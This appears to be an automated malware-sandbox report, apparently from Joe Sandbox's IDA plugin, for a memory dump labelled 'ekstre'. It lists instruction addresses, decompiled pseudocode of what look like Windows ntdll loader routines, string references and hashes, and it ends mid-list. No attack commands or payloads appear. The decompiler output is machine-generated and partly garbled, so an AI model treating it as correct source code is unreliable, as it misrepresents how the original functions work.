0x341857e2
0x341857dd
0x341857eb
0x341857ee
0x341857f2
0x341857fb
0x341857fb
0x341857f4
0x341857f4
0x3418561b
0x3418561e
0x34185621
0x34185623
0x00000000
0x34185625
0x34185625
0x34185629
0x3418562d
0x00000000
0x3418562d
0x34185623
0x3418560a
0x341855a3
0x341855a9
0x341855ad
0x341855b0
0x00000000
0x00000000
0x341855b2
0x341855b7
0x341855ba
0x341855bc
0x341855c0
0x341855c0
0x341855c4
0x341855c7
0x341855ca
0x341855dc
0x341855e4
0x341855e4
0x341855e4
0x341855cc
0x341855cf
0x00000000
0x00000000
0x341855d1
0x341855d4
0x00000000
0x00000000
0x341855d6
0x341855d8
0x00000000
0x341855da
0x00000000
0x341855da
0x341855d8
0x341855c0
0x00000000
0x341855bc
0x34185306
0x3418530a
0x34185324
0x341853d1
0x341853d3
0x00000000
0x00000000
0x341853d9
0x341853df
0x00000000
0x00000000
0x341853e9
0x341853eb
0x341d6b36
0x341d6b39
0x341d6b3c
0x00000000
0x00000000
0x341d6b42
0x341d6b47
0x341d6b4a
0x341d6b4c
0x00000000
0x00000000
0x00000000
0x00000000
0x341d6b52
0x341d6b52
0x341d6b52
0x341d6b56
0x341d6b59
0x341d6b5c
0x00000000
0x00000000
0x341d6b62
0x341d6b65
0x00000000
0x00000000
0x341d6b6b
0x341d6b6e
0x00000000
0x00000000
0x341d6b74
0x341d6b76
0x00000000
0x00000000
0x00000000
0x341d6b78
0x341d6b52
0x341853f1
0x341853f9
0x34185401
0x341d6b7d
0x00000000
0x341d6b7d
0x3418540e
0x341d6b8b
0x341d6b95
0x341d6b97
0x341d6b9b
0x341d6b9d
0x00000000
0x00000000
0x00000000
0x34185414
0x34185414
0x34185418
0x34185420
0x34185439
0x34185446
0x34185451
0x34185460
0x34185472
0x3418547d
0x00000000
0x00000000
0x34185483
0x34185487
0x3418548e
0x341d6bad
0x341d6bb5
0x341d6bb9
0x34185494
0x34185494
0x34185494
0x34185496
0x341854a1
0x341854af
0x341854b7
0x341854c2
0x341854c3
0x341854ce
0x341854d9
0x341854e4
0x341854e9
0x341854ed
0x341854f1
0x341d6bc2
0x341d6bc5
0x341d6bc9
0x341d6bcf
0x341d6bd2
0x341d6be3
0x341d6be3
0x341d6bc9
0x34185503
0x3418550a
0x341d6bed
0x341d6bf9
0x341d6bfa
0x341d6bfc
0x341d6c00
0x341d6c01
0x00000000
0x00000000
0x00000000
0x00000000
0x3418550a
0x3418540e
0x3418532e
0x34185332
0x34185339
0x341d6af3
0x341d6afb
0x341d6aff
0x3418533f
0x3418533f
0x3418533f
0x34185341
0x34185349
0x34185357
0x3418535c
0x34185364
0x34185365
0x34185370
0x3418537b
0x3418538b
0x3418538d
0x34185393
0x341d6b08
0x341d6b0b
0x341d6b0f
0x341d6b15
0x341d6b18
0x341d6b2c
0x341d6b2c
0x341d6b0f
0x341853a8
0x341853af
0x3418557c
0x3418557e
0x34185580
0x00000000
0x00000000
0x00000000
0x341853cd
0x341853cd
0x00000000
0x341853cd
0x341853af
0x34185300
0x34185586
0x34185589
0x00000000
0x00000000
0x3418558b
0x3418558f
0x341d6aa6
0x341d6aaa
0x341d6aad
0x341d6ad8
0x341d6ad8
0x00000000
0x341d6ad8
0x341d6aaf
0x341d6ab2
0x00000000
0x00000000
0x341d6ab4
0x341d6ab7
0x00000000
0x00000000
0x341d6abd
0x341d6ac0
0x00000000
0x00000000
0x341d6ac6
0x341d6aca
0x341d6acd
0x00000000
0x00000000
0x341d6acf
0x341d6ad2
0x00000000
0x00000000
0x00000000
0x341d6ad2
0x00000000
0x3418558f
0x00000000
0x34185300
0x341852dd
0x341852e4
0x341d6a93
0x341d6a96
0x00000000
0x00000000
0x00000000
0x341d6a96
0x341852ea
0x341852ea
0x341852ea
0x00000000
0x341852b9
0x341852a1
0x341852a7
0x341d6a2a
0x341d6a2d
0x341d6a89
0x341d6a89
0x00000000
0x341d6a89
0x341d6a2f
0x341d6a33
0x341d6a36
0x341d6a3d
0x341d6a3d
0x341d6a40
0x341d6a7f
0x341d6a7f
0x00000000
0x341d6a7f
0x341d6a42
0x341d6a46
0x341d6a49
0x341d6a50
0x341d6a50
0x341d6a53
0x341d6a6d
0x341d6a6f
0x341d6a79
0x00000000
0x341d6a79
0x341d6a55
0x341d6a59
0x341d6a5c
0x341d6a63
0x341d6a63
0x00000000
0x341d6a63
0x341d6a5e
0x341d6a61
0x00000000
0x00000000
0x00000000
0x341d6a61
0x341d6a4b
0x341d6a4e
0x00000000
0x00000000
0x00000000
0x341d6a4e
0x341d6a38
0x341d6a3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x341852a7

Strings

@, xrefs: 341854C3
@, xrefs: 34185365

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 05368fe758f75ffec6b39d7974f3ed39b06eb6bc3ee133f14df11e6defa0fd6b
Instruction ID: ea3df3ddf509331d4d00cc82196c8c3b9d285e26fb6188e3f7ffb21375e69db9
Opcode Fuzzy Hash: 05368fe758f75ffec6b39d7974f3ed39b06eb6bc3ee133f14df11e6defa0fd6b
Instruction Fuzzy Hash: 5F32ABB4608B118FD7508F14C4D0B6AB7E6EF89784F91896EF9858B2A4E774C844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 34175622 Relevance: 3.1, APIs: 2, Instructions: 104
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E34175622(signed int __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ebx;
				void* _t32;
				void* _t33;
				intOrPtr* _t36;
				char* _t52;
				intOrPtr _t55;
				void* _t72;
				signed int _t78;

				_push(__ecx);
				_t72 = __edx;
				_t75 = __ecx;
				if(_a4 == 0x102) {
					_t32 = E34177072(__ecx, __edx, 0);
					if(_t32 != 0) {
						L3:
						_t33 = E34183C40();
						_t52 = 0x7ffe0386;
						if(_t33 != 0) {
							_t36 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t36 = 0x7ffe0386;
						}
						if( *_t36 != 0) {
							E34244C59( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						E34176F4C( &_v8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						 *((intOrPtr*)(_t75 + 0x30)) =  *((intOrPtr*)(_t72 + 0x30));
						 *((intOrPtr*)(_t75 + 0x34)) =  *((intOrPtr*)(_t72 + 0x34));
						 *0x342691e0(_t75,  *((intOrPtr*)(_t72 + 0x34)), _t72, _a4);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x30))))();
						if(E34183C40() != 0) {
							_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						}
						if( *_t52 != 0) {
							E34244CD2( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						_t32 = E34176ECF(_v8);
						L9:
						return _t32;
					}
					goto L9;
				}
				_t55 =  *((intOrPtr*)(__edx + 0x58));
				if(_t55 != 0) {
					if(E34192120(_t55, __ecx, 0, _t55) >= 0) {
						 *(__ecx + 0x50) =  *(__ecx + 0x50) | 0x00000100;
						 *((intOrPtr*)(__ecx + 0x64)) = _t55;
						goto L2;
					}
					_t78 = __ecx | 0xffffffff;
					_t32 = L3419DB40(_t72 + 0x20, _t78, 0);
					asm("lock xadd [edi], esi");
					if(_t78 == 1) {
						 *0x342691e0(_t72);
						_t32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + 4))))))();
					}
					goto L9;
				}
				L2:
				E34177007(_t75, _t72);
				goto L3;
			}

0x34175627
0x34175632
0x34175634
0x34175636
0x341756c7
0x341756ce
0x34175650
0x34175650
0x34175655
0x3417565c
0x341d0642
0x34175662
0x34175662
0x34175662
0x34175668
0x341d065e
0x341d065e
0x3417567a
0x34175685
0x3417568c
0x34175698
0x3417569e
0x341756a7
0x341d0671
0x341d0671
0x341756b0
0x341d068e
0x341d068e
0x341756b9
0x341756be
0x341756c2
0x341756c2
0x00000000
0x341756d0
0x3417563c
0x34175641
0x341d05f9
0x341d062a
0x341d0631
0x00000000
0x341d0631
0x341d05fb
0x341d0605
0x341d060a
0x341d060f
0x341d061d
0x341d0623
0x341d0623
0x00000000
0x341d060f
0x34175647
0x3417564b
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34175698
RtlDebugPrintTimes.NTDLL ref: 341D061D

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ba8e907cfaaf56479a0ac2bef9a7e2da6dc67b6461f6f31dfc6dd57705a5c850
Instruction ID: e5f886f4f40a441b306d58d335b1c562953c60452bc8fa37c3230b20894da8d4
Opcode Fuzzy Hash: ba8e907cfaaf56479a0ac2bef9a7e2da6dc67b6461f6f31dfc6dd57705a5c850
Instruction Fuzzy Hash: 36319C35201F02EFE7859B64C9C0A9AFFAAFF45794F044169E90057E50DB70A821CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 341F9567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341F9598
RtlDebugPrintTimes.NTDLL ref: 341F95D6

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 538b43a5eecce56afb1eed5f1ea899afc1d91ab097009193539b4cafd78c71e4
Instruction ID: d24e878831cefde4efacda903ace60c8ffbd2af24cbba762fc6b8b7e7aa54078
Opcode Fuzzy Hash: 538b43a5eecce56afb1eed5f1ea899afc1d91ab097009193539b4cafd78c71e4
Instruction Fuzzy Hash: 06110872B14615EFEB059B5CCDC8A5DBABDEB48264F1142AAE405E3310CB75AD02CF84

Uniqueness

Uniqueness Score: -1.00%

Function 341F174B Relevance: 2.8, Strings: 2, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E341F174B(void* __ecx) {
				intOrPtr _v12;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				signed int _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v92;
				signed int* _v96;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				char _v112;
				intOrPtr _v120;
				char _v124;
				char _v128;
				intOrPtr _v136;
				char _v140;
				char _v141;
				void* _t108;
				signed int _t109;
				intOrPtr _t115;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr* _t165;
				char _t167;
				void* _t170;
				void* _t171;
				intOrPtr _t174;
				char _t179;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				char _t186;
				void* _t190;
				void* _t192;
				signed int _t194;
				void* _t196;
				signed int _t197;
				signed int _t198;
				void* _t200;
				signed int* _t203;

				_t171 = __ecx;
				_t183 =  *((intOrPtr*)( *[fs:0x30] + 8));
				_t167 = 0;
				_t200 = 0;
				_t194 =  *(__ecx + 6) & 0x0000ffff;
				_t108 = ( *(__ecx + 0x14) & 0x0000ffff) + 0x2c;
				_v141 = 0;
				_v104 = _t183;
				if(_t194 == 0) {
					L7:
					_t109 =  *(_t171 + 0xac);
					if(_t109 == 0) {
						L15:
						_t184 =  *((intOrPtr*)(_t171 + 0x9c));
						if(_t184 != 0) {
							_t162 =  *((intOrPtr*)(_t171 + 0x98)) + _t184;
							if(_t162 > _t200) {
								_t200 = _t162;
							}
						}
						_push(0);
						_push(0x30);
						_push( &_v52);
						_push(0x25);
						_push(0xffffffff);
						if(L341B2B20() < 0) {
							L44:
							return _t167;
						} else {
							_t22 = _t200 + 0x2000; // 0x2000
							if(_t22 >= _v12) {
								goto L44;
							}
							_t115 =  *0x34265b24; // 0x3f22cc8
							_t25 = _t115 + 0x28; // 0x3f21cd8
							if(L34191BA0(_t171,  *_t25,  &_v84, 0, 0) == 0) {
								goto L44;
							}
							_v72 = _v72 & 0x00000000;
							_v60 = _v60 & 0x00000000;
							_v56 = _v56 & 0x00000000;
							_push(0x60);
							_v68 =  &_v84;
							_push(5);
							_push( &_v92);
							_v76 = 0x18;
							_push( &_v76);
							_push(0x100001);
							_v64 = 0x40;
							_push( &_v128);
							if(E341B2CE0() < 0) {
								L43:
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v80);
								goto L44;
							}
							_push(0);
							_v136 = 0;
							_v140 = _v12 + 0xfffffffc;
							_push( &_v140);
							_t196 = 4;
							_push(_t196);
							_push( &_v112);
							_push( &_v92);
							_push(0);
							_push(0);
							_push(0);
							_push(_v128);
							if(E341B29F0() < 0) {
								L42:
								_push(_v128);
								E341B2A80();
								goto L43;
							}
							_t185 = _v112;
							_t174 = _v12;
							if(_t185 < _t196 || _t185 + 4 > _t174) {
								L32:
								if(_t185 + 0xc > _t174) {
									goto L42;
								}
								_v140 = _t174 - _t185 - 0xc;
								_push(0);
								_push( &_v140);
								_push(8);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E341B29F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									goto L38;
								}
								_t179 = _v124;
								_t78 = _t179 + 4; // 0x103
								if(_t78 > _v12) {
									goto L42;
								}
								_v140 = _t179;
								_push(0);
								_push( &_v140);
								_push(_t196);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E341B29F0() < 0 || _v124 != 0x44646441) {
									goto L42;
								} else {
									goto L38;
								}
							} else {
								_push(0);
								_v140 = _t185 - 4;
								_push( &_v140);
								_push(8);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E341B29F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									L38:
									_t167 = 1;
									_v108 = _v108 & 0x00000000;
									_t203 = E3417A86F(_v104);
									if(_t203 != 0 &&  *_t203 >= 0x48) {
										_v96 = _t203;
										_v108 =  *_t203;
										_push( &_v100);
										_push(_t196);
										_push( &_v108);
										_push( &_v96);
										_push(0xffffffff);
										if(E341B2EB0() >= 0) {
											_t203[0x10] = _t203[0x10] & 0x00000000;
											_t203[0x11] = _t203[0x11] & 0x00000000;
											_push( &_v100);
											_push(_v100);
											_push( &_v108);
											_push( &_v96);
											_push(0xffffffff);
											E341B2EB0();
										}
									}
									goto L42;
								}
								_t186 = _v124;
								_t174 = _v12;
								_t59 = _t186 + 4; // 0x103
								if(_t59 > _t174) {
									L31:
									_t185 = _v112;
									goto L32;
								}
								_v140 = _t186;
								_push(0);
								_v136 = 0;
								_push( &_v140);
								_push(_t196);
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E341B29F0() < 0) {
									goto L42;
								}
								if(_v124 == 0x44646441) {
									goto L38;
								}
								_t174 = _v12;
								goto L31;
							}
						}
					}
					_t170 =  *((intOrPtr*)(_t171 + 0xa8)) + _t183;
					_push("true");
					_pop(_t197);
					_t198 = _t109 / _t197;
					if(_t198 == 0) {
						L14:
						_t167 = _v141;
						goto L15;
					}
					_t164 = _t170 + 0x18;
					do {
						if( *((intOrPtr*)(_t164 - 8)) != 0) {
							_t190 =  *_t164 +  *((intOrPtr*)(_t164 - 8));
							if(_t190 > _t200) {
								_t200 = _t190;
							}
						}
						_t164 = _t164 + 0x1c;
						_t198 = _t198 - 1;
					} while (_t198 != 0);
					goto L14;
				} else {
					_t165 = _t108 + __ecx;
					do {
						if( *((intOrPtr*)(_t165 - 4)) != 0) {
							_t192 =  *_t165 +  *((intOrPtr*)(_t165 - 4));
							if(_t192 > _t200) {
								_t200 = _t192;
							}
						}
						_t165 = _t165 + 0x28;
						_t194 = _t194 - 1;
					} while (_t194 != 0);
					_t183 = _v104;
					goto L7;
				}
			}

0x341f174b
0x341f1762
0x341f1765
0x341f176b
0x341f176d
0x341f1771
0x341f1774
0x341f1778
0x341f177e
0x341f179f
0x341f179f
0x341f17a7
0x341f17de
0x341f17de
0x341f17e6
0x341f17ee
0x341f17f2
0x341f17f4
0x341f17f4
0x341f17f2
0x341f17f6
0x341f17f8
0x341f17fe
0x341f17ff
0x341f1801
0x341f180a
0x341f1a8a
0x341f1a92
0x341f1810
0x341f1810
0x341f181d
0x00000000
0x00000000
0x341f182c
0x341f1831
0x341f183b
0x00000000
0x00000000
0x341f1841
0x341f184a
0x341f184f
0x341f1854
0x341f1856
0x341f185e
0x341f1860
0x341f1865
0x341f186d
0x341f186e
0x341f1877
0x341f187f
0x341f1887
0x341f1a75
0x341f1a85
0x00000000
0x341f1a85
0x341f1896
0x341f189a
0x341f189e
0x341f18a6
0x341f18a9
0x341f18aa
0x341f18af
0x341f18b4
0x341f18b5
0x341f18b6
0x341f18b7
0x341f18b8
0x341f18c3
0x341f1a6c
0x341f1a6c
0x341f1a70
0x00000000
0x341f1a70
0x341f18c9
0x341f18d2
0x341f18db
0x341f197f
0x341f1984
0x00000000
0x00000000
0x341f1993
0x341f1999
0x341f199a
0x341f199b
0x341f19a1
0x341f19a5
0x341f19aa
0x341f19ab
0x341f19ac
0x341f19ad
0x341f19ae
0x341f19b9
0x00000000
0x00000000
0x341f19c3
0x00000000
0x00000000
0x341f19c5
0x341f19c9
0x341f19d3
0x00000000
0x00000000
0x341f19d9
0x341f19e3
0x341f19e4
0x341f19e5
0x341f19ea
0x341f19ee
0x341f19f3
0x341f19f4
0x341f19f5
0x341f19f6
0x341f19f7
0x341f1a02
0x00000000
0x00000000
0x00000000
0x00000000
0x341f18ec
0x341f18f1
0x341f18f2
0x341f18fa
0x341f18fb
0x341f1901
0x341f1905
0x341f190a
0x341f190b
0x341f190c
0x341f190d
0x341f190e
0x341f1919
0x00000000
0x00000000
0x341f1923
0x341f1a0a
0x341f1a0e
0x341f1a10
0x341f1a1a
0x341f1a1e
0x341f1a25
0x341f1a2b
0x341f1a33
0x341f1a34
0x341f1a39
0x341f1a3e
0x341f1a3f
0x341f1a48
0x341f1a4a
0x341f1a52
0x341f1a56
0x341f1a57
0x341f1a5f
0x341f1a64
0x341f1a65
0x341f1a67
0x341f1a67
0x341f1a48
0x00000000
0x341f1a1e
0x341f1929
0x341f192d
0x341f1934
0x341f1939
0x341f197b
0x341f197b
0x00000000
0x341f197b
0x341f193d
0x341f1941
0x341f1946
0x341f194a
0x341f194b
0x341f1950
0x341f1955
0x341f1956
0x341f1957
0x341f1958
0x341f1959
0x341f1964
0x00000000
0x00000000
0x341f196e
0x00000000
0x00000000
0x341f1974
0x00000000
0x341f1974
0x341f18db
0x341f180a
0x341f17af
0x341f17b3
0x341f17b5
0x341f17b8
0x341f17bc
0x341f17da
0x341f17da
0x00000000
0x341f17da
0x341f17be
0x341f17c1
0x341f17c5
0x341f17c9
0x341f17ce
0x341f17d0
0x341f17d0
0x341f17ce
0x341f17d2
0x341f17d5
0x341f17d5
0x00000000
0x341f1780
0x341f1780
0x341f1782
0x341f1786
0x341f178a
0x341f178f
0x341f1791
0x341f1791
0x341f178f
0x341f1793
0x341f1796
0x341f1796
0x341f179b
0x00000000
0x341f179b

Strings

AddD, xrefs: 341F18CD
@, xrefs: 341F1877

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: 725fd03ef57fa6f7983bbf400bb736aa43a2e5291958a2a9e11eda8458ee3b43
Instruction ID: 897e65ba7586fbb2387885fa66a11625d3a8d9aaa18a4014c2fd346ea50fa4f9
Opcode Fuzzy Hash: 725fd03ef57fa6f7983bbf400bb736aa43a2e5291958a2a9e11eda8458ee3b43
Instruction Fuzzy Hash: 34A17CB6504740AFE354CB14CC84FABB7E9FB84714F504B2EF99886150E771E90ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 3424B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3424B5C4
RedirectedKey, xrefs: 3424B60E

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: a7688af5723b1eda7365511da037c06581772d0192475f47add52867ea0af486
Instruction ID: 06b37a1f5167e24efd4c768403515725d7850e3ccaa9d6a09aa2759b64f67020
Opcode Fuzzy Hash: a7688af5723b1eda7365511da037c06581772d0192475f47add52867ea0af486
Instruction Fuzzy Hash: CA61E1B6801619EFDB11CF95C988ADEBFB9FB08714F50406AF805B7210D7749A46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 3418F640 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E3418F640(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t96;
				signed int _t99;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				void* _t120;
				intOrPtr _t123;
				signed int _t128;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t139;
				void* _t141;

				_push(0x78);
				_push(0x3424c3a0);
				L341C7BE4(__ebx, __edi, __esi);
				_t137 =  *[fs:0x18];
				 *((intOrPtr*)(_t139 - 0x24)) = _t137;
				_t74 =  *[fs:0x30];
				 *((intOrPtr*)(_t139 - 0x2c)) =  *[fs:0x30];
				_t128 =  *(_t137 + 0xfb4);
				 *(_t139 - 0x20) = _t128;
				if(_t128 != 0) {
					_push("true");
					_t121 = _t128;
					E34174779(_t74, _t128);
				}
				if(( *( *[fs:0x18] + 0xfca) & 0x00000008) != 0) {
					_t76 =  *[fs:0x18];
					__eflags =  *(_t76 + 0xfca) & 0x00000020;
					if(( *(_t76 + 0xfca) & 0x00000020) == 0) {
						L26:
						_t109 = 0;
						L19:
						__eflags = _t128;
						if(_t128 != 0) {
							 *(_t137 + 0xfb4) = _t109;
							_push(2);
							_t121 = _t128;
							E34174779(_t76, _t128);
						}
						_t129 =  *(_t137 + 0xf94);
						__eflags = _t129;
						if(_t129 != 0) {
							 *(_t137 + 0xf94) = _t109;
							E3417FED0(0x34265b40);
							_push(0x34265b40);
							E3417E740(_t111);
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109, _t129);
						}
						__eflags =  *(_t137 + 0xfca) & 0x00000004;
						if(( *(_t137 + 0xfca) & 0x00000004) != 0) {
							 *(_t137 + 0x10) = _t109;
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109,  *(_t137 + 0x10));
						}
						L341A4940();
						_t85 = 0x400;
						__eflags =  *(_t137 + 0xfca) & 0x00000400;
						if(( *(_t137 + 0xfca) & 0x00000400) != 0) {
							__eflags =  *0x342665f4 - 3;
							if( *0x342665f4 == 3) {
								_t85 = E34244080(_t111, _t121);
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0x10));
						return _t85;
					}
				}
				_t76 = 0x2000;
				if(( *(_t137 + 0xfca) & 0x00002000) != 0) {
					goto L26;
				}
				_t111 = 0x1000;
				_t109 = 0;
				if(( *( *[fs:0x18] + 0xfca) & 0x00001000) != 0) {
					 *((char*)(_t139 - 0x19)) = 1;
				} else {
					 *((char*)(_t139 - 0x19)) = 0;
					_t111 = 0;
					L341919DF(0);
				}
				E34192755(_t121);
				 *(_t139 - 4) = _t109;
				_t89 =  *0x34265da0; // 0x3f4ab60
				while(_t89 != 0x34265d9c) {
					_t16 = _t89 - 0x10; // 0x3f4ab50
					_t123 = _t16;
					 *((intOrPtr*)(_t139 - 0x30)) = _t123;
					_t18 = _t89 + 4; // 0x3f4ae20
					_t96 =  *_t18;
					 *((intOrPtr*)(_t139 - 0x28)) = _t96;
					 *((intOrPtr*)(_t139 - 0x38)) = _t96;
					_t21 = _t123 + 0x34; // 0x8a2cc
					_t111 =  *_t21;
					_t24 = _t123 + 0x18; // 0x76c80000
					if( *((intOrPtr*)( *((intOrPtr*)(_t139 - 0x2c)) + 8)) !=  *_t24 && (_t111 & 0x00040000) == 0) {
						_t27 = _t123 + 0x1c; // 0x76cb5cd0
						_t99 =  *_t27;
						 *(_t139 - 0x34) = _t99;
						if(_t99 != 0 && _t111 == 0x80004) {
							 *(_t139 - 0x3c) = _t99;
							 *((intOrPtr*)(_t139 - 0x60)) = 0x24;
							 *(_t139 - 0x5c) = 1;
							_t117 = 7;
							memset(_t139 - 0x58, 0, _t117 << 2);
							_t141 = _t141 + 0xc;
							_t34 = _t123 + 0x48; // 0x0
							E3418DC40(_t139 - 0x60,  *_t34);
							 *(_t139 - 4) = 1;
							_t135 =  *((intOrPtr*)(_t139 - 0x30));
							_t155 =  *((intOrPtr*)(_t135 + 0x3a)) - _t109;
							if( *((intOrPtr*)(_t135 + 0x3a)) != _t109) {
								_t120 = 3;
								E3418F0A3(_t109, _t120, _t135, _t135, _t137, _t155);
							}
							_push(_t109);
							_push(3);
							_t111 =  *(_t139 - 0x34);
							E3418DCD1(_t109,  *(_t139 - 0x34),  *((intOrPtr*)(_t135 + 0x18)), _t135, _t137, _t155);
							 *(_t139 - 4) = _t109;
							_t128 =  *(_t139 - 0x20);
							E3418F85E();
						}
					}
					_t89 =  *((intOrPtr*)(_t139 - 0x28));
				}
				_t121 =  *0x34265b24; // 0x3f22cc8
				__eflags =  *((intOrPtr*)(_t121 + 0x3a)) - _t109;
				if( *((intOrPtr*)(_t121 + 0x3a)) != _t109) {
					 *((intOrPtr*)(_t139 - 0x84)) = 0x24;
					 *(_t139 - 0x80) = 1;
					_t114 = 7;
					__eflags = 0;
					memset(_t139 - 0x7c, 0, _t114 << 2);
					_t49 = _t121 + 0x48; // 0x0
					E3418DC40(_t139 - 0x84,  *_t49);
					 *(_t139 - 4) = 2;
					_t121 =  *0x34265b24; // 0x3f22cc8
					_t111 = 3;
					E3418F0A3(_t109, _t111, _t121, _t139 - 0x7c + _t114, _t137, __eflags);
					 *(_t139 - 4) = _t109;
					_t128 =  *(_t139 - 0x20);
					E3418F87D();
				}
				 *(_t139 - 4) = 0xfffffffe;
				L3418F867(_t109, _t111);
				_t76 = E341A6540(_t111);
				goto L19;
			}

0x3418f640
0x3418f642
0x3418f647
0x3418f64c
0x3418f653
0x3418f656
0x3418f65c
0x3418f65f
0x3418f665
0x3418f66a
0x3418f66c
0x3418f66e
0x3418f670
0x3418f670
0x3418f682
0x341d9c28
0x341d9c2e
0x341d9c35
0x3418f857
0x3418f857
0x3418f7da
0x3418f7da
0x3418f7dc
0x3418f7de
0x3418f7e4
0x3418f7e6
0x3418f7e8
0x3418f7e8
0x3418f7ed
0x3418f7f3
0x3418f7f5
0x3418f82b
0x3418f836
0x3418f83b
0x3418f840
0x3418f850
0x3418f850
0x3418f7f7
0x3418f7fe
0x341d9c79
0x341d9c87
0x341d9c87
0x3418f804
0x3418f809
0x3418f80e
0x3418f815
0x341d9c91
0x341d9c98
0x341d9c9e
0x341d9c9e
0x341d9c98
0x3418f81e
0x3418f82a
0x3418f82a
0x341d9c3b
0x3418f688
0x3418f694
0x00000000
0x00000000
0x3418f6a0
0x3418f6a5
0x3418f6ae
0x341d9c40
0x3418f6b4
0x3418f6b4
0x3418f6b7
0x3418f6b9
0x3418f6b9
0x3418f6be
0x3418f6c3
0x3418f6c6
